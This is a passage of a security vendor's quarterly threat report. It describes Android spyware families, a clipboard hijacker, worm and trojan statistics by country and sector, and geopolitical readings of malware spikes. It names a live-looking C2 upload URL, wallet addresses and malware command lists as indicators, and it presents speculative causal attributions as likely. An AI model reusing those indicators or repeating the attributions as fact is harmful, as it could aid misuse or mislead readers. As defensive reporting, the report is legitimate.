This malware is distributed in a bundle with the All-Radio 427 Portable software All-Radio 427 is a legitimate video and audio player created by Russian developers But cybercriminals copied the program and added the malicious code The malicious version of All-Radio 427 was used for spreading different types of malware clipboard cryptocurrency hijackers among them
Here is an example of a clipboard hijacker attack
A user copied wallet address 3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs but the malware changed it to 1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm
Global Threat Report Q2 2018 Edition
Page 25 of 73
An example of a clipboard hijacker attack
Spreading of Clipboard Hijacker malware around the world
Although cryptominers have decreased in quantity they seem to come back in an updated disguise and promise to become a new serious challenge for cybersecurity departments and vendors
Global Threat Report Q2 2018 Edition
Page 26 of 73
4 Android Devices Under Siege
41 Spying Stealing Mining Android devices are rapidly becoming high-value targets for cybercriminals and malware authors It is not surprising because today almost any smartphone is a treasure trove of information for perpetrators People increasingly use smartphones for financial operations but those are not the only jackpot for attackers Today every smartphone contains a plethora of confidential information about its owner
If the victim is a CEO politician or other VIP the content of the mobile device can be sold at the highest prices Perpetrators can sell stolen information to interested parties or extort money by blackmailing their victims Of course not only cybercriminals hunt for smartphone content Intelligence agencies and business competitors want to know everything about their targets Add jealous spouses tracking every move of their partners and parents wanting to control their children and you will easily understand why Android-oriented malware is a growing business
Today spying is the number one purpose of the Android malware In Q2 Comodo analysts detected a variety of spying tools that penetrate mobile devices and extract data from them You can see the whole family of these digital spooks on the graph
The digital spooks
Global Threat Report Q2 2018 Edition
Page 27 of 73
Like real-world spies digital agents impersonate legitimate entities pretending to innocent applications or hiding malicious code inside legitimate software Like real spies they seek to remain invisible and constantly change disguises to avoid detection and hone their tradecraft from version to version
411 KevDroid The first is named KevDroid Itrsquos distributed in three versions
Version-1 Naver Defender
Version-2 Netease Defender
Version-3
PU
Disguises of KevDroid
The first version disguised as the Naver Defender application covertly penetrates a mobile device and hides its icon from the launcher screen to avoid detection This sample has multifunctional abilities for spying It steals account details contacts id name phone numbers and email address of the owner It grabs SMS messages and associated info It attempts to read call logs (number name type duration) emails (email type) and photos of the contacts After extracting all the data the malware encrypts it with ldquoAESrdquo algorithm and send to the attackersrsquo server httphttpcgalimcomadminhrpupuphpdo=upload
KevDroid records the victimrsquos every phone call then encrypts and uploads it to the cybercriminalsrsquo server In addition it collects information about currently running services installed apps and the launcher name
The second version Netease Defender has additional spying abilities It takes control over the device camera and covertly records the victimrsquos activity Then it sends the video to the attackersrsquo server
Version-3 of KevDroid makes photos records call and creates a list of files on the device Also it extracts the web history account and contact details and the device information
People assume they are safe if they download apps exclusively from the official Google Play store This wrong assumption can be costly the first version of Desert Scorpion spyware was spread via official Google Play Services The spyware was camouflaged as a chat called Dardesh Instant App But when a user downloaded and ran it the app covertly connected to
Global Threat Report Q2 2018 Edition
Page 28 of 73
cybercriminalsrsquo Command and Control server and downloaded the spyware on the device From that moment the spyware constantly kept track of all events on the infected device Another means of the malware dissemination was social networks
Version-1 Dardesh Google Play Services Instant Apps
Version-2 Settings
Disguises of Desert Scorpion
The second version of Desert Scorpion records calls audios and videos uninstalls other apps sends and receives messages and tracks the location of the smartphone It is included in some spyware tools like FinSpy and Pegasus Beyond the capabilities of the first version it collects information about installed applications extracts the metadata and makes changes on the victim device
Global Threat Report Q2 2018 Edition
Page 29 of 73
412 Zoo Park The next member of the spy family Zoo Park has 4 different versions
Version-1 Telegram Groups انتخاب دھم
Version-2 Postrall Yes For Referendum انتخاب دھم
Version-3 Celebs Gone Wild جریدة النھار الكویتیة 剑侠挂机
Version-4 VPN Easy DroFirewall m_android
Disguises of Zoo Park
The first version tries to impersonate the Telegram app It extracts Accounts and Contacts details encodes them with Base64 and sends to the attackers server The second version has additional abilities extracting SMS details device information (including IMEI Network Operator Name SDK version OS version etc) Call Log details and External Storage content
The third version is included in spyware named ldquoSpymaster Prordquo and can
Enable and disable the GPS services
Record audio and send it to Command amp Control server
Upload image files
Collect information about the application installed
Collect browserrsquos data
Send SMS and read outgoing SMS
The fourth version is spread in malicious clones of popular legitimate applications like VPN Easy DroFirewall etc
Global Threat Report Q2 2018 Edition
Page 30 of 73
In addition to the abilities of previous versions it includes some additional tricks
Extracts photos audios and videos
Records screen
Executes shell commands
Records calls
413 MikeSpy Some spyware examples specifically hunt for messengerrsquos data Like the next digital spook MikeSpy
Virtual Girlfriend
Disguises of MikeSpy
MikeSpy camouflaged itself as a Virtual Girlfriend application But instead of girlfriend it has a bundle of malicious abilities
Takes control over Bluetooth Adapter
Extracts data about accounts contacts details installed apps
Extracts data from the WhatsApp Message DB and related keys
Uploads collected data to the cybercriminalsrsquo server via FTP
414 Xloader The next spyware Xloader combines spying with purposeful hunting for banking applications on the device It has trust-inspired cover icons imitating Facebook and Google Chrome
Version-1 to Version-3 FaceBook Chrome
Disguises of Xloader
Global Threat Report Q2 2018 Edition
Page 31 of 73
After infection Xloader connects to its CampC server and executes the following commands
Extract the device information
Delete SMS
Set ringer mode
Monitor incoming SMS messages
Clear memory
Check for the next banking applications presence comwooribankpibsmart comkbstarkbbank comibkneobanking comscdanbscbankapp comshinhansbanking comhanabankebkchannelandroidhananbank nhsmart comepostpsfsdsi comkftckjbsmb comsmgspbsrdquo
Extract contacts details
Set Wi-Fi always turned on
Version 2 can execute additional commands
Send SMS and read outgoing SMS
Enable and disable a Wi-Fi connection
Access to a location specified by attackers
Make records
Make calls
415 Stalker Spy The next malware in the raw is Stalker Spy As you can see its a champion in the number of masks it puts on to deceive users
App Distribution
FlexiSpy MBackup
HelloSpy ProActivator TActivator Setting Wi-Fi Settings ردیاب اسپای ھاید Keylogger System Service
Global Threat Report Q2 2018 Edition
Page 32 of 73
Mobile Spy
随意代挂 Subway Surfers 라이브성인방송 Мобильный антивирус droidgetlogevent SmartcardService Cheats Z
CloudAgent New Insta Follow Android CJ 대한통운 택배 余生代挂APP Basic Daydreams SystemWifiService Samplecom мобильный клиент Asa刷钻
Disguises of Stalker Spy
In addition to usual must-have spyware set Xloader can turn on microphone remotely on the infected device to make recordings This malware is used in three known applications FlexiSpy HelloSpy MobiSpy
416 Mystery Bot The next malware is much more than a spy The first version of Mystery Bot is a combination of spyware that steals information with a banking trojan that connects to CampC server of Locky bot The second version Mystery Bot is ransomware that encrypts files on external storage After encryption the malware deletes original files So we can call it a spy with an OO7 licenserdquo
Version 1 Adobe Flash Player
Version2 Flash Player
Disguises of Mystery Bot
Mystery Bot comes under cover of Adobe Flash Player Below is the list of some commands that the malware can execute on your device
Global Threat Report Q2 2018 Edition
Page 33 of 73
Send_SMS mdash extract SMS content and set it to CampC server
Send_USSD mdash send the USSD to CampC server
Gethistory mdash monitor browser history
Start_AllApp mdash gather info about installed applications
Send_call mdash set the Intent action to call
Forward_call mdash forward incoming calls
ResForward_call mdash reset the forward calls
Go_Smsmnd mdash delete SMS content
Go_GetAlls mdashget SMS History
Dell_sms mdash delete SMS content in a conversation
Send_spam mdash send spam SMS
Start_Inject mdash call injectors class
417 FakeSpy FakeSpy also has many masks that you can see in the screenshot
佐川急便 현대캐피탈
Disguises of FakeSpy
It collects available information from the infected device and sends to CampC servers Also it checks for the next banking applications aucomapp softbankcomapp docomocomapp
Here are some commands from its Command and Control server
contacts - Get contact details and email id
Mute - Set action to mute
Mms - Get MMS content
info - Get device information
Global Threat Report Q2 2018 Edition
Page 34 of 73
418 RedAlert RedAlert changes multiple ldquospy legendsrdquo to get users trust It wears masks of popular application to deceive its victims Update Flash Player Viber WhatsApp Update WhatsApp Ebook Reader
Version 1 EbookReader Update Flash Player Android Update WhatsApp Viber
Version_2 Update Google Market Flash Player Tactic FlashLight
Disguises of RedAlert
RedAlert is spread via online hacking forums Its distinguishing feature is the ability to block incoming calls from banks It canvasses the device in search of the following bank applications
depostbankfinanzassistent
plmbank
aibibankandroid
The second version can block access to some websites including Google Chrome Google Play store Gmail and YouTube
419 Hero Rat The next digital spook Hero Rat mostly acts on the Iran territory It uses third-party play stores social networks and messengers for spreading
Version 1
CloudVPN MyIrancel Mtprotoزیـــــبانـــــویس تلگرام ھمھ کاره
Proxy دوست یاب Telegram Ton
Global Threat Report Q2 2018 Edition
Page 35 of 73
شارژ رایگان بگیر App Master Anti Rat PlatformA فالورگیر نامحدود اینترنت رایگان
Disguises of Hero Rat
Its code is available on the Telegram hacking channel Noticeably that itrsquos sold in three options bronze silver and gold
After infiltration into a victimrsquos device Hero Rat shows a warning like app canrsquot be runrdquo But it runs in the background and starts the spying activity It steals text messages audio records makes calls detect device location etc The newly infected device is controlled via Telegram bot functionality
Hero Rat disguises as Bitcoin Free Internet Connection Get free Followers and Telegram versions for Iranian market
4110 Sonvpay The next malware Sonvpay also wears many masks but it is more of a fraudster than a spy
Version 1
Caculator-2018 Despacito Ringtone CaroGame2018 Wifi-Hostpot
Reccoder-Call QRCodeBar Scanner APK
Let me love you ringtone Iphone Ringtone Night light
Beauty camera-Photo editor Shape of you ringtone
Disguises of Sonvpay
Global Threat Report Q2 2018 Edition
Page 36 of 73
Sonvpay covertly subscribes the infected devices to WAP and SMS services to add extra charges to the ownerrsquos mobile billing Once installed this malware displays fake notification ldquoskip optionrdquo If you click this button this malware begins to work in the background subscribing the user to services she did not order
It comes to victims in a variety of disguises named below
4111 CoinHive And the last one in our Q2 Android malware list is CoinHive We already mentioned it earlier in the report and here is the version for Android devices CoinHive for Android comes in three versions every of them updates its mining potential It is disseminated via counterfeit apps you see below But one of the vectors is especially interesting
Version-1 Netflix Hack Instagram Hack
Version-2 TSF Launcher
Version-3 Android Service PlacarTv Futebol Ao Vivo
Disguises of CoinHive
The malware is covertly propagated via hellip another cryptominer named CoinMiner
How is it possible Letrsquos imagine a cybercriminal who wants to infect its victims with a cryptominer to utilize their recourses for cryptocurrency mining She chooses CoinMiner for that purpose downloads it and implants into the victimsrsquo machines However she is not aware that earlier another cybercriminal infected CoinMiner with CoinHive So the first attacker is a victim Thief robbing thief
This story clearly illustrates the situation in cybersecurity in Q2 No one can feel totally secure Even a predator can turn prey in seconds
Global Threat Report Q2 2018 Edition
Page 37 of 73
42 Android Malware Catalogued by Month Below you will find detailed statistics on Android-targeted malware by months
421 April 2018
Android-targeted malware on April
422 May 2018
Android targeted malware on May
020000400006000080000
100000120000140000160000180000
050000
100000150000200000250000300000350000400000450000500000
Global Threat Report Q2 2018 Edition
Page 38 of 73
423 June 2018
Android-targeted malware on June
0
50000
100000
150000
200000
250000
300000
Global Threat Report Q2 2018 Edition
Page 39 of 73
5 Malware in Q2 2018 The Big Picture
Above is a visualization of malware activity that Comodo detected in Q2 2018 The graphic covers over 400 million unique malware detections in 237 countriesrsquo top-level domains (ccTLD) This report tries to disentangle this web of malicious activity and understand each malware type individually as well as its impact around the world
Global Threat Report Q2 2018 Edition
Page 40 of 73
51 Strategic Threat Computer Worms A computer worm is like a virus but typically travels autonomously exploiting vulnerabilities in network defenses as it spreads across the Internet A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network However even worms without a payload can consume enormous bandwidth diminish network or local system resources and possibly cause a denial-of-service For this Q2 2018 Report we place Worms in a special category called ldquoStrategic Threatrdquo due to their ability to travel very quickly across the Internet and compromise many computers at once
Global Threat Report Q2 2018 Edition
Page 41 of 73
511 Generic Worms This section shows the worldrsquos most common computer worm detections covering generic worm-like activity that is not tied to a specific propagation vector
Brontok which has been plaguing our planet for over a decade ranked as the top computer Worm followed by Conficker Nimda and over 300 more
The bubble chart shows that in Q2 2018 Russia (ru) Turkey (tr) and India (in) were the countries with the highest number of Worm infections
And finally this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May) with Russian worm detections spread more evenly throughout Q2 2018
Global Threat Report Q2 2018 Edition
Page 42 of 73
512 Net Worms A ldquoNet Wormrdquo typically infects network shares (such as a remote hard drive or server) from which it can infect every computer that accesses it from a local area network (LAN) or company intranet
In Q2 2018 Allaple was the most common Net Worm detected which Microsoft describes as a ldquomulti-threaded polymorphicrdquo worm that can perform denial-of-service (DoS) attacks against websites
The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2
The timeline above shows that Poland Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2 and that French detections were spread more evenly throughout the quarter
Global Threat Report Q2 2018 Edition
Page 43 of 73
513 Email Worms Email worms are nasty in that they can travel between victim computers for example via computer exploits and autorun functionality
This quarter the most common Email Worm by far was Runonce
The top four countries for Email Worm detection were Russia (ru) Germany (de) South Africa (za) and Brazil (br)
This timeline shows the primary Email Worm outbreaks during Q2 2018 with Russia experiencing rather frequent Email Worm challenges Germany having the deepest concentration at the beginning of June and Poland the sharpest spike toward the end of Q2
Global Threat Report Q2 2018 Edition
Page 44 of 73
514 p2p Worms A peer-to-peer (p2p) network consists of interconnected nodes (or ldquopeersrdquo) that share resources without the use of a centralized administrative system Such networks are commonly employed to share files such as unauthorized copies of books and films and hackers take advantage of this dynamic to disseminate malware
Polip was the most common p2p Worm in Q2 2018 Microsoft describes Polip as a ldquomemory residentrdquo virus that infects ldquoexerdquo and ldquoscrrdquo file and may leverage the Gnutella p2p network protocol to distribute copies of itself
The bubble chart above clearly shows Russia as the primary home to p2p Worms in Q2 2018
And this timeline shows that Russia did not suffer from just one p2p Worm outbreak but many
Global Threat Report Q2 2018 Edition
Page 45 of 73
515 IM Worms Did you know that social media accounts can be used to spread malware One special type of computer worm known as an ldquoIMrdquo or instant messaging worm can be used to send malicious links via sites such as Facebook either manually or automatically
During Q2 2018 most of the IM Worms that Comodo detected were in Iran as illustrated in the bubble chart below
This particular IM Worm was a variant of a famous IM Worm called Yahos which led to the arrest of 10 people in 2012 by the FBI for spreading banking malware via social networks with the Yahos IM Worm
This timeline shows that while Comodo did not detect many IM Worms they were nonetheless detected throughout Q2 2018 in various corners of the globe mostly in developing countries
Global Threat Report Q2 2018 Edition
Page 46 of 73
52 High Threat Malware
In this section we cover four high-threat malware types Backdoors Viruses Trojans and Exploits In contrast to Worms these malware types can be considered a more localized threat as they typically require some level of user interaction for propagation and installation However once they are installed on a system or network they can be devastating to personal or enterprise security
Global Threat Report Q2 2018 Edition
Page 47 of 73
521 Backdoors A backdoor is a hidden way to bypass normal user authentication often leveraged to gain covert remote access to a computer system cryptosystem or algorithm A backdoor can be an installed program or a modification to an existing legitimate program
The most common Backdoor that Comodo detected for Q2 2018 was Dark Komet (or Comet) a remote access trojan (RAT) that is fully 10 years old This malware allows a hacker to control a compromised system with the aid of a Graphical User Interface (GUI) and can be used for almost any purpose including various kinds of cyber espionage
The United Kingdom (ldquogbrdquo for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2
The UKrsquos Backdoor challenges are also apparent in this timeline Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018
Global Threat Report Q2 2018 Edition
Page 48 of 73
522 Viruses A computer virus is self-replicating code that ldquoinfectsrdquo other computer programs and devices by corrupting them in malicious ways that can facilitate data theft spam dissemination data destruction and more A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action such as by opening an attachment or clicking on a hyperlink
Ramnit was the top Virus for Q2 2018 Microsoft describes Ramnit as a ldquosevererdquo virus that infects Windows executable files (EXE) and HTML files (HTML) and spreads through infected removable drives such as USB flash drives
The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses but also that many other countries were affected especially developing countries
This timeline shows that Ukraine experienced two significant Virus spikes in mid-April and mid-May
Global Threat Report Q2 2018 Edition
Page 49 of 73
523 Trojans Trojans take their name from the famous wooden horse of Greek mythology due to malicious functionality that is hidden within seemingly useful or benign computer programs Typically Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack including the installation and execution of ransomware
In Q2 2018 Starter was the most common trojan infecting systems in well over 100 countries Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a ldquoRemote Service Accountrdquo
The bubble chart shows that Germany (de) was the 1 country for Trojans according to Comodo detections
And this timeline shows when this huge Trojan infestation took place in the beginning of June 2018
Global Threat Report Q2 2018 Edition
Page 50 of 73
524 Exploits Computer Exploits comprise software data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware Exploits can enable unauthorized access privilege escalation or denial-of-service (DoS)
The discovery of computer exploits can be rare as such vulnerabilities are typically patched and fixed quickly once they are discovered
In Q2 2018 the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target Adobe Portable Document Format (pdf) files which were created in the 1990s to present documents in a common format independent of application software hardware and operating systems
Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018 with Japan clearly experiencing the most persistent challenges
Global Threat Report Q2 2018 Edition
Page 51 of 73
53 Medium Threat Malware In this section we will focus on five malware types that are somewhat rarer and more exotic These include Email Flooders Constructors Jokes Virtual Tools and Malware Packers
Global Threat Report Q2 2018 Edition
Page 52 of 73
531 Constructor Constructors are applications that can be used to automatically create malware files
For Q2 Alamar was the 1 constructor that Comodo detected Microsoft describes this program as a ldquoSevererdquo malware threat to PC users
In Q2 Germany (de) was the top country of detection for Constructors
And this timeline shows that Germany not only had a serious problem with Constructors in Q2 but also that the malware is likely a persistent threat to German networks
Global Threat Report Q2 2018 Edition
Page 53 of 73
532 Packers Malware that is ldquopackedrdquo refers to any means used to hide or obfuscate malicious executable code by compressing or ldquopackingrdquo it within larger seemingly innocuous software and data streams The hostile code can even come in the form of scripts The compressed data often contains separate decompression code or even a self-extracting archive which is used to recreate the original code from the compressed code and then execute the malware Encryption may also be used to conceal the malware from security software as another means to obfuscate the attack
MUPX or the Modified ldquoUltimate Packer for Executablesrdquo dominated this part of the malware landscape MUPX is free open source software that is compatible with numerous file formats and different operating systems and leverages an open source data compression algorithm UCL that is just a few hundred bytes of code in length
In Q2 2018 Russia was the 1 home to malware Packers
This timeline shows that Russia had the most persistent Packer problems while Iran had the highest periodic spikes
Global Threat Report Q2 2018 Edition
Page 54 of 73
533 Email Flooder Email Flooders are malware used to overwhelm email servers with messages in order to ldquokillrdquo it or shut it down in a form of denial-of-service (DoS) attack
The one Email Flooder that Comodo detected in Q2 2018 was Palevo which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders
The primary country where Comodo detected this malicious behavior was in Germany
And this timeline shows that while the number of Palevo detections was not high it was still a persistent threat in Germany
Global Threat Report Q2 2018 Edition
Page 55 of 73
534 Virtual Tools Virtual Tools are programs that can modify or alter malicious files to avoid detection
The top Virtual Tools that Comodo detected in Q2 2018 were Patcher AntiAV and RunFile
The top two countries for Virtual Tools detections were Germany and the US
This timeline shows that Germany had one particularly heavy infestation around the beginning of June while the US had two sharp spikes one at the start and the other at the end of Q2 2018
Global Threat Report Q2 2018 Edition
Page 56 of 73
535 Jokes ldquoJokerdquo malware is in fact just what it says these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor or simply to annoy the user for a brief period of time
Such malware is typically only labeled a ldquoMediumrdquo threat because the hackerrsquos intention is not to damage or destroy information but merely to have fun at the victimrsquos expense
Germany (de) and the US were the top two countries of detection for Joke malware
In this timeline you can see that this malware type is not numerous ndash but still something to be aware of
Global Threat Report Q2 2018 Edition
Page 57 of 73
54 Low Threat Malware Applications In this section we will cover a range of malicious functionality that Comodo detected within Applications Unwanted Applications and Unsafe Applications
Global Threat Report Q2 2018 Edition
Page 58 of 73
541 Applications Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose However Comodo detects and flags such applications as malicious because they to exhibit behavior that of which users may be unaware including extreme efforts to track user behavior and location
In Q2 2018 the most common such application was Elex Despite the fact that Microsoft has labeled Elex only as ldquoPotentially Unwanted Applicationrdquo or PUA this software is nasty and attempts to install files that run at startup add drivers inject processes alter browser behavior and modify DNS settings
The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications
And finally this timeline shows that far from being a rare occurrence such malicious software is endemic especially in North America
Global Threat Report Q2 2018 Edition
Page 59 of 73
542 Unwanted Applications The unwanted application malware category is alarming in that during the course of common computer and Internet activity users often inadvertently install these Applications For example they include common adware programs widely disseminated images videos dialers jokes gossip and more
The most common unwanted application that Comodo detected this quarter was DealPly which Microsoft describes as ldquopoor reputationrdquo software that tries to install additional bundled software modify the user homepage modify search provider andor perform other actions users might not have intended They include free toolbars adware and ldquosystem optimizersrdquo
As you can see in the bubble chart the US is far and away the most common country of detection for unwanted applications in Q2 2018
And as this timeline shows this malware type poses not only a large but also a daily challenge to network security in the US
Global Threat Report Q2 2018 Edition
Page 60 of 73
543 Unsafe Applications Unsafe applications are seemingly legitimate programs but in fact are frequently leveraged by coders and hackers with malicious intent Often they claim to help users with administrative or security functionality but in fact do the opposite and include fake anti-virus and free Internet Relay Chat (IRC) clients
The most common unsafe application that Comodo detected in Q2 2108 was AutoKMS software that can be used to ldquocrackrdquo or patch unregistered copies of Microsoft software These are referred to as ldquohacktoolsrdquo and may be distributed with additional malware that users can install inadvertently
This malware type is a bit different in that while the US is currently the most common country of detection Ukraine (ua) and Russia (ru) are 2 and 3 respectively
This timeline shows that the US ndash and to a lesser extent Ukraine ndash have a steady problem with Unsafe Applications while Russia experienced one major spike in Q2 2018
Global Threat Report Q2 2018 Edition
Page 61 of 73
6 Vertical analysis In this section letrsquos examine unique malware profiles that Comodo identified within specific ldquoverticalsrdquo or economic sectors The infographic details unique malware distributions for twenty-two vertical markets or industries from automotive to travel covering four dangerous malware types Backdoors Trojans Viruses and Worms Further the diagram lists the 1 malware family for each Verticalrsquos top malware type
Letrsquos take a closer look at two trojans Kryptik and Zbot that were the top detected in not only one but within multiple verticals clearly making them a current strategic threat across the world
Global Threat Report Q2 2018 Edition
Page 62 of 73
First Kryptik the New Jersey Cybersecurity amp Communications Integration Cell reported that Kryptik was first created to obtain information about an infected hostrsquos FTP servers but now has the ability to target email clients file browsers and file managers CNET Magazine wrote that Kryptik has been used as a trojan ldquoClickerrdquo to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017
Second letrsquos examine ldquoZbotrdquo which is another name for the ldquoZeusrdquo Trojan undermining Microsoft Windows security since 2007 One of its first uses was to target the United States Department of Transportation And over a decade later Zbot is still the top Trojan in government and transportation verticals Today the Zeus botnet may be the largest on the Internet with millions of compromised machines around the world
Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing It has also been used to install ransomware including CryptoLocker Zbot is often spread through drive-by downloads and email phishing attacks sometimes supported by a social engineering scheme that falsely claims that a targetrsquos computer already has a Virus and needs to be cleaned
In conclusion trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks Second strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them
Global Threat Report Q2 2018 Edition
Page 63 of 73
7 Geopolitical Intelligence
71 USA This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018 Clearly the major spike on March 13 stands out in this data What happened on this day in the US and what might help to explain the surge in malware activity On that day US President Donald Trump announced the names of his new Secretary of State Mike Pompeo and new CIA Director Gina Haspel In that light one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements comprising many requests for information related to upcoming changes in US political military and intelligence activities After which these agencies immediately began to fulfill these requirements via computer hacking ndash commonly called cyber espionage ndash which today takes place on a far greater scale than the public realizes
Global Threat Report Q2 2018 Edition
Page 64 of 73
72 China This chart illustrates Comodorsquos aggregated malware detections in China for Q2 2018 Clearly June 4 stands out as the single most prominent day The reason for this massive spike is that many intelligence services ndash both foreign and domestic ndash were likely busy trying to protect andor collect sensitive information relating to current events within China Why on June 4 That is the anniversary of the 1989 Tiananmen Square protests
Global Threat Report Q2 2018 Edition
Page 65 of 73
73 South Korea
National security events always attract the attention of professional hackers who seek to collect the kind of information as the basis for intelligence reporting This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018 The highest single spikes took place simultaneous to annual joint US-South Korean military exercises This fact should come as little surprise in the Internet age when everyone from students to soldiers spies and statesmen does most of their work online Students collect data for academic papers spies collect data for intelligence reports
Global Threat Report Q2 2018 Edition
Page 66 of 73
74 North Korea
The chart above shows Comodo malware detections in North Korea during Q2 2018 At the beginning of May Comodo saw a spike consisting of well over ten times the number of usual detections One plausible explanation for this activity is that someone or some institution was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world Comodo did further research on the detected malware and identified it as Windows activation or ldquocrackingrdquo software and Chinese-made anti-censorship programs
Global Threat Report Q2 2018 Edition
Page 67 of 73
75 Armenia
All major geopolitical events today are bathed in malware The reason is that all activities ndash from social activities to business politics or national security affairs ndash are mostly performed online This is especially true during times of national crisis as both government and citizen are in overdrive trying to gather new information ndash or trying to prevent others from doing the same Ample evidence is provided by this timeline which shows that Armeniarsquos 2018 political revolution was accompanied by Comodorsquos largest detection of malware within that country during Q2 2018
Global Threat Report Q2 2018 Edition
Page 68 of 73
76 Belarus
A common hacker refrain is that ldquoinformation wants to be freerdquo Evidence for this argument is provided by this timeline which shows Comodorsquos Virus and Trojan detections in Belarus in Q2 2018 On June 14 as the government in Minsk passed new legislation with a view toward controlling the spread of ldquofake newsrdquo Comodo detected a massive spike in both viruses and trojans It is possible that the virus outbreak was specifically used to disseminate trojan horses which were then leveraged for some real-world purpose either to gather deny or manipulate sensitive information related to the new legislation and its impact on Belarus society
Global Threat Report Q2 2018 Edition
Page 69 of 73
77 Iraq
Today there is possibly no hotter topic in information security than election hacking In this chart showing Comodo malware detections in Iraq in Q2 2018 two clear spikes stand out that we must consider Both might be associated with recent electoral incidents In mid-April Iraq was preparing for a national election which included a conundrum on how best to secure its electronic dimension And at the beginning of July Iraq was preparing for a vote recount following accusations of impropriety at the polls
Global Threat Report Q2 2018 Edition
Page 70 of 73
78 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detection ndash and sometimes there may be multiple reasons In this timeline of Comodo malware detections in Ukraine in Q2 2018 there may have been multiple reasons for the highest spike on May 24 Both of the cited news stories are from May 23 the first discusses Ukrainersquos Independence Day as well as Ukrainersquos testing of new military weapons provided by the US government the second describes a cyberattack that Ukraine feared would target a major sporting event the Champions League final in Ukrainersquos capital city Kyiv on May 26
Global Threat Report Q2 2018 Edition
Page 71 of 73
79 Croatia
Since the cyberattack that targeted Estonia in 2007 it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations In that context this massive spike in malware detection in Croatia on March 28 is interesting as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an ldquoact of hostilityrdquo
Global Threat Report Q2 2018 Edition
Page 72 of 73
710 Finland Russia USA
Finally letrsquos have a look at Comodorsquos virus detections in Finland during Q2 2018 The largest single spike ndash by far ndash occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinkirsquos suburb of Vantaa ndash precisely where the summit was scheduled to take place
Global Threat Report Q2 2018 Edition
Page 73 of 73
8 Conclusions In Q2 Comodo Cybersecurity observed several new significant trends likely to radically influence the cybersecurity marketplace and IT end users These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios
The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon Trojans are a covert weapon and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected with the real impact of these attacks being revealed in quarters to come Another meaningful fact is that trojans serve as a delivery vector for other types of malware Combined these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples
Our findings show that malware is becoming more cunning in delivery method sophisticated in persistence and much harder to detect by antivirus software Propagation of fileless malware the evolution of cryptominers and using legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems presaging new attacks and mobile malware development As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures) cybercriminals can anticipate rich pickings from exploiting those devices With successful penetration perpetrators profit by stealing money selling confidential information or blackmailing victims
Moreover given that the majority of detected trojans in Q2 were information stealers we can see another dangerous tendency the accelerating of cybercriminalsrsquo bias to hunt for confidential data
Combined these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy policies and postures
NORTH AMERICA―
EUROPE―
ASIA―
REQUEST A DEMO Try Comodo Cybersecurity by speaking with
a security consultant to begin the process to set up a demo or proof-of-concept project
Contact us directly at +1 888-266-6361
copy 2018 ALL RIGHTS RESERVED COMODO SECURITY SOLUTIONS INC
VISIT COMODOCOM
Comodo Security Solutions Inc1255 Broad StreetClifton NJ 07013United StatesTel +1 (888) 551 1531Tel +1 (888) 266 6361Int +1 (703) 581 6361Fax +1 (973) 777 4394salescomodocom
Comodo Security Solutions IncȘoseaua Națională 31 Iași 700237Romania Europe+40 332 806 772
Comodo Security Solutions Pvt LtdPrestige Office Centre183 NSK Salai VadapalaniChennai IndiaTe +91 44 4562 2800wwwcomodocoin
Comodo Threat Research Labs monitors filters and analyzes malware ransomware viruses and other ldquounknownrdquo potentially dangerous files 247365 in over 190
countries around the world With 5 offices spread across the Americas Asia and Europe (and staff covering over 190 countries) the Lab is made up of more
than 220 IT security professionals ethical hackers computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing
millions of potential pieces of malware phishing spam or other maliciousunwanted files and emails every day
The Lab also works with trusted partners in academia government and industry to gain additional insights into known and potential
threats CTRLrsquos mission is to use the best combination of cybersecurity technology and innovations machine
learning-powered analytics artificial intelligence and human experts and insights to secure and protect
